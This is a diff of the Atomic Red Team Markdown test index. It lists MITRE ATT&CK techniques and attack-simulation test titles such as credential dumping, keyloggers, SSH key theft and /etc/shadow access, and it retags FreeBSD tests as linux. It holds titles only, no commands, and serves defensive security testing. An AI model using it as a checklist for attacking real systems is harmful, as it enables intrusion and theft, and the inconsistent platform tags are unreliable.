#8: Create a new Windows admin user [windows] - T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1503,7 +1503,7 @@ - T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux] + - Atomic Test #1: Modify SSH Authorized Keys [linux, macos] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) @@ -1623,9 +1623,9 @@ - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) - Atomic Test #1: Add command to .bash_profile [macos, linux] - Atomic Test #2: Add command to .bashrc [macos, linux] - - Atomic Test #3: Add command to .shrc [freebsd] - - Atomic Test #4: Append to the system shell profile [freebsd, linux] - - Atomic Test #5: Append commands user shell profile [freebsd, linux] + - Atomic Test #3: Add command to .shrc [linux] + - Atomic Test #4: Append to the system shell profile [linux] + - Atomic Test #5: Append commands user shell profile [linux] - Atomic Test #6: System shell profile scripts [linux] - Atomic Test #7: Create/Append to .bash_logout [linux] - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md) 
@@ -1670,12 +1670,12 @@ - Atomic Test #1: rc.common [macos] - Atomic Test #2: rc.common [linux] - Atomic Test #3: rc.local [linux] - - Atomic Test #4: rc.local (FreeBSD) [freebsd] + - Atomic Test #4: rc.local (FreeBSD) [linux] - T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] - - Atomic Test #2: Create SysV Service [freebsd] + - Atomic Test #2: Create SysV Service [linux] - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1703,7 +1703,7 @@ - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #1: At.exe Scheduled task [windows] - Atomic Test #2: At - Schedule a job [linux] - - Atomic Test #3: At - Schedule a job freebsd [freebsd] + - Atomic Test #3: At - Schedule a job freebsd [linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) - Atomic Test #1: Netsh Helper DLL Registration [windows] 
@@ -1719,11 +1719,11 @@ - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows] - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows] - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [freebsd] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [freebsd] + - Atomic Test #13: Login as nobody (freebsd) [linux] - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -1733,7 +1733,7 @@ - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #1: Base64 Encoded data. [macos, linux] - - Atomic Test #2: Base64 Encoded data (freebsd) [freebsd] + - Atomic Test #2: Base64 Encoded data (freebsd) [linux] - Atomic Test #3: XOR Encoded data. [windows] - T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) 
@@ -1785,11 +1785,11 @@ - Atomic Test #2: Tor Proxy Usage - Windows [windows] - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux] - Atomic Test #4: Tor Proxy Usage - MacOS [macos] - - Atomic Test #5: Tor Proxy Usage - FreeBSD [freebsd] + - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux] - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1571 Non-Standard Port](../../T1571/T1571.md) - Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows] - - Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos] + - Atomic Test #2: Testing usage of uncommonly used port [linux, macos] - [T1573 Encrypted Channel](../../T1573/T1573.md) - Atomic Test #1: OpenSSL C2 [windows] - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1806,14 +1806,14 @@ - [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) - Atomic Test #1: Malicious User Agents - Powershell [windows] - Atomic Test #2: Malicious User Agents - CMD [windows] - - Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos] + - Atomic Test #3: Malicious User Agents - Nix [linux, macos] - [T1105 Ingress Tool Transfer](../../T1105/T1105.md) - - Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos] - - Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos] + - Atomic Test #1: rsync remote file copy (push) [linux, macos] + - Atomic Test #2: rsync remote file copy (pull) [linux, macos] + - Atomic Test #3: scp remote file copy (push) [linux, macos] + - Atomic Test #4: scp remote file copy (pull) [linux, macos] + - Atomic Test #5: sftp remote file copy (push) [linux, macos] + - Atomic Test #6: sftp remote file copy (pull) [linux, macos] - Atomic Test #7: certutil download (urlcache) [windows] - Atomic Test #8: certutil download (verifyctl) [windows] - Atomic Test #9: Windows - BITSAdmin BITS Download [windows] @@ -1821,7 +1821,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - - Atomic Test #14: whois file download [freebsd, linux, macos] + - Atomic Test #14: whois file download [linux, macos] - Atomic Test #15: File Download via PowerShell [windows] - Atomic Test #16: File download with finger.exe on Windows [windows] - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] 
@@ -1840,7 +1840,7 @@ - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md) - - Atomic Test #1: Connection Proxy [freebsd, macos, linux] + - Atomic Test #1: Connection Proxy [linux, macos] - Atomic Test #2: Connection Proxy for macOS UI [macos] - Atomic Test #3: portproxy reg key [windows] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1855,17 +1855,17 @@ - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows] - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows] - Atomic Test #5: Data Compressed - nix - zip [linux, macos] - - Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos] - - Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos] - - Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux] + - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] + - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] + - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos] - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #1: Screencapture [macos] - Atomic Test #2: Screencapture (silent) [macos] - Atomic Test #3: X Windows Capture [linux] - - Atomic Test #4: X Windows Capture (freebsd) [freebsd] + - Atomic Test #4: X Windows Capture (freebsd) [linux] - Atomic Test #5: Capture Linux Desktop using Import Tool [linux] - - Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [freebsd] + - Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux] - Atomic Test #7: Windows Screencapture [windows] - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows] - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1873,8 +1873,8 @@ - Atomic Test #1: Input Capture [windows] - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] - Atomic Test #3: Logging bash history to syslog [linux] - - Atomic Test #4: Logging sh history to syslog/messages [freebsd] - - Atomic Test #5: Bash session based keylogger [freebsd, linux] + - Atomic Test #4: Logging sh history to syslog/messages [linux] + - Atomic Test #5: Bash session based keylogger [linux] - Atomic Test #6: SSHD PAM keylogger [linux] - Atomic Test #7: Auditd keylogger [linux] - Atomic Test #8: MacOS Swift Keylogger [macos] @@ -1890,7 +1890,7 @@ - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #1: Stage data from Discovery.bat [windows] - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - - Atomic Test #3: Stage data from Discovery.sh (freebsd) [freebsd] + - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux] - Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows] - [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows] 
@@ -1913,10 +1913,10 @@ - [T1005 Data from Local System](../../T1005/T1005.md) - Atomic Test #1: Search files of interest and save them to a single zip file (Windows) [windows] - [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) - - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux] + - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux] + - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux] + - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux] + - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux] - T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1560 Archive Collected Data](../../T1560/T1560.md) - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows] 
@@ -2010,14 +2010,14 @@ - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] - - Atomic Test #2: Malicious PAM rule (freebsd) [freebsd] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #1: Input Capture [windows] - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] - Atomic Test #3: Logging bash history to syslog [linux] - - Atomic Test #4: Logging sh history to syslog/messages [freebsd] - - Atomic Test #5: Bash session based keylogger [freebsd, linux] + - Atomic Test #4: Logging sh history to syslog/messages [linux] + - Atomic Test #5: Bash session based keylogger [linux] - Atomic Test #6: SSHD PAM keylogger [linux] - Atomic Test #7: Auditd keylogger [linux] - Atomic Test #8: MacOS Swift Keylogger [macos] @@ -2028,7 +2028,7 @@ - Atomic Test #4: Password Brute User using Kerbrute Tool [windows] - Atomic Test #5: SUDO Brute Force - Debian [linux] - Atomic Test #6: SUDO Brute Force - Redhat [linux] - - Atomic Test #7: SUDO Brute Force - FreeBSD [freebsd] + - Atomic Test #7: SUDO Brute Force - FreeBSD [linux] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] 
@@ -2066,13 +2066,13 @@ - T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - - Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [freebsd] - - Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux] + - Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux] + - Atomic Test #3: Dump individual process memory with Python (Local) [linux] - Atomic Test #4: Capture Passwords with MimiPenguin [linux] - T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux] - - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd] + - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux] - Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos] - Atomic Test #4: Packet Capture Windows Command Prompt [windows] - Atomic Test #5: Windows Internal Packet Capture [windows] 
@@ -2080,8 +2080,8 @@ - Atomic Test #7: Windows Internal pktmon set filter [windows] - Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos] - Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos] - - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd] - - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd] + - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux] + - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux] - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux] - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux] - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux] 
@@ -2131,13 +2131,13 @@ - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) - Atomic Test #1: Private Keys [windows] - - Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux] + - Atomic Test #2: Discover Private SSH Keys [linux, macos] - Atomic Test #3: Copy Private SSH Keys with CP [linux] - - Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [freebsd] + - Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux] - Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux] - - Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [freebsd] + - Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux] - Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux] - - Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [freebsd] + - Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux] - Atomic Test #9: ADFS token signing and encryption certificates theft - Local [windows] - Atomic Test #10: ADFS token signing and encryption certificates theft - Remote [windows] - Atomic Test #11: CertUtil ExportPFX [windows] 
@@ -2181,14 +2181,14 @@ - Atomic Test #1: Staging Local Certificates via Export-Certificate [windows] - [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - - Atomic Test #2: Search Through sh History [freebsd] + - Atomic Test #2: Search Through sh History [linux] - [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) - - Atomic Test #1: Find AWS credentials [freebsd, macos, linux] + - Atomic Test #1: Find AWS credentials [macos, linux] - Atomic Test #2: Extract Browser and System credentials with LaZagne [macos] - - Atomic Test #3: Extract passwords with grep [freebsd, macos, linux] + - Atomic Test #3: Extract passwords with grep [linux, macos] - Atomic Test #4: Extracting passwords with findstr [windows] - Atomic Test #5: Access unattend.xml [windows] - - Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux] + - Atomic Test #6: Find and Access Github Credentials [linux, macos] - Atomic Test #7: WinPwn - sensitivefiles [windows] - Atomic Test #8: WinPwn - Snaffler [windows] - Atomic Test #9: WinPwn - powershellsensitive [windows] @@ -2216,7 +2216,7 @@ - [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) - Atomic Test #1: SSH Credential Stuffing From Linux [linux] - Atomic Test #2: SSH Credential Stuffing From MacOS [macos] - - Atomic Test #3: SSH Credential Stuffing From FreeBSD [freebsd] + - Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux] - Atomic Test #4: Brute Force:Credential Stuffing using Kerbrute Tool [windows] - T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -2229,10 +2229,10 @@ - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] - - Atomic Test #2: Access /etc/master.passwd (Local) [freebsd] - - Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux] - - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux] - - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux] + - Atomic Test #2: Access /etc/master.passwd (Local) [linux] + - Atomic Test #3: Access /etc/passwd (Local) [linux] + - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux] + - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux] - [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows] - [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) @@ -2273,7 +2273,7 @@ # discovery - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - Atomic Test #1: System Owner/User Discovery [windows] - - Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos] + - Atomic Test #2: System Owner/User Discovery [linux, macos] - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows] - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows] - Atomic Test #5: GetCurrent User with PowerShell Script [windows] 
@@ -2316,20 +2316,20 @@ - Atomic Test #23: Active Directory Domain Search [linux] - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md) - - Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux] - - Atomic Test #2: View sudoers access [freebsd, linux, macos] - - Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos] - - Atomic Test #4: List opened files by user [freebsd, linux, macos] + - Atomic Test #1: Enumerate all accounts (Local) [linux] + - Atomic Test #2: View sudoers access [linux, macos] + - Atomic Test #3: View accounts with UID 0 [linux, macos] + - Atomic Test #4: List opened files by user [linux, macos] - Atomic Test #5: Show if a user account has ever logged in remotely [linux] - - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [freebsd] - - Atomic Test #7: Enumerate users and groups [freebsd, linux, macos] + - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux] + - Atomic Test #7: Enumerate users and groups [linux, macos] - Atomic Test #8: Enumerate users and groups [macos] - Atomic Test #9: Enumerate all accounts on Windows (Local) [windows] - Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows] - Atomic Test #11: Enumerate logged on users via CMD (Local) [windows] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] - - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd] + - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] - Atomic Test #3: Detect Virtualization Environment (Windows) [windows] - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos] - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows] 
@@ -2353,10 +2353,10 @@ - Atomic Test #1: System Service Discovery [windows] - Atomic Test #2: System Service Discovery - net.exe [windows] - Atomic Test #3: System Service Discovery - systemctl [linux] - - Atomic Test #4: System Service Discovery - service [freebsd] + - Atomic Test #4: System Service Discovery - service [linux] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux] - - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd] + - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux] - Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos] - Atomic Test #4: Packet Capture Windows Command Prompt [windows] - Atomic Test #5: Windows Internal Packet Capture [windows] @@ -2364,8 +2364,8 @@ - Atomic Test #7: Windows Internal pktmon set filter [windows] - Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos] - Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos] - - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd] - - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd] + - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux] + - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux] - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux] - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux] - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux] 
@@ -2373,7 +2373,7 @@ - [T1135 Network Share Discovery](../../T1135/T1135.md) - Atomic Test #1: Network Share Discovery [macos] - Atomic Test #2: Network Share Discovery - linux [linux] - - Atomic Test #3: Network Share Discovery - FreeBSD [freebsd] + - Atomic Test #3: Network Share Discovery - FreeBSD [linux] - Atomic Test #4: Network Share Discovery command prompt [windows] - Atomic Test #5: Network Share Discovery PowerShell [windows] - Atomic Test #6: View available share drives [windows] @@ -2387,16 +2387,16 @@ - [T1082 System Information Discovery](../../T1082/T1082.md) - Atomic Test #1: System Information Discovery [windows] - Atomic Test #2: System Information Discovery [macos] - - Atomic Test #3: List OS Information [freebsd, linux, macos] + - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] - - Atomic Test #6: FreeBSD VM Check via Kernel Modules [freebsd] + - Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux] - Atomic Test #7: Hostname Discovery (Windows) [windows] - - Atomic Test #8: Hostname Discovery [freebsd, linux, macos] + - Atomic Test #8: Hostname Discovery [linux, macos] - Atomic Test #9: Windows MachineGUID Discovery [windows] - Atomic Test #10: Griffon Recon [windows] - Atomic Test #11: Environment variables discovery on windows [windows] - - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux] + - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos] - Atomic Test #13: Show System Integrity Protection status (MacOS) [macos] - Atomic Test #14: WinPwn - winPEAS [windows] - Atomic Test #15: WinPwn - itm4nprivesc [windows] 
@@ -2410,7 +2410,7 @@ - Atomic Test #23: WinPwn - PowerSharpPack - Seatbelt [windows] - Atomic Test #24: Azure Security Scan with SkyArk [azure-ad] - Atomic Test #25: Linux List Kernel Modules [linux] - - Atomic Test #26: FreeBSD List Kernel Modules [freebsd] + - Atomic Test #26: FreeBSD List Kernel Modules [linux] - Atomic Test #27: System Information Discovery with WMIC [windows] - Atomic Test #28: Driver Enumeration using DriverQuery [windows] - Atomic Test #29: System Information Discovery [windows] @@ -2423,10 +2423,10 @@ - [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md) - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws] - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md) - - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux] + - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux] - Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos] - Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos] - - Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [freebsd] + - Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux] - Atomic Test #5: List Google Chrome / Opera Bookmarks on Windows with powershell [windows] - Atomic Test #6: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows] - Atomic Test #7: List Mozilla Firefox bookmarks on Windows with command prompt [windows] 
@@ -2436,7 +2436,7 @@ - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] - Atomic Test #3: System Network Configuration Discovery [macos, linux] - - Atomic Test #4: System Network Configuration Discovery (freebsd) [freebsd] + - Atomic Test #4: System Network Configuration Discovery (freebsd) [linux] - Atomic Test #5: System Network Configuration Discovery (TrickBot Style) [windows] - Atomic Test #6: List Open Egress Ports [windows] - Atomic Test #7: Adfind - Enumerate Active Directory Subnet Objects [windows] 
@@ -2456,21 +2456,21 @@ - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows] - Atomic Test #2: File and Directory Discovery (PowerShell) [windows] - - Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux] - - Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux] + - Atomic Test #3: Nix File and Directory Discovery [linux, macos] + - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos] - Atomic Test #5: Simulating MAZE Directory Enumeration [windows] - Atomic Test #6: Launch DirLister Executable [windows] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] - - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos] + - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos] - Atomic Test #4: System Discovery using SharpView [windows] - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md) - Atomic Test #1: AWS S3 Enumeration [iaas:aws] - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - - Atomic Test #1: Process Discovery - ps [freebsd, linux, macos] + - Atomic Test #1: Process Discovery - ps [linux, macos] - Atomic Test #2: Process Discovery - tasklist [windows] - Atomic Test #3: Process Discovery - Get-Process [windows] - Atomic Test #4: Process Discovery - get-wmiObject [windows] 
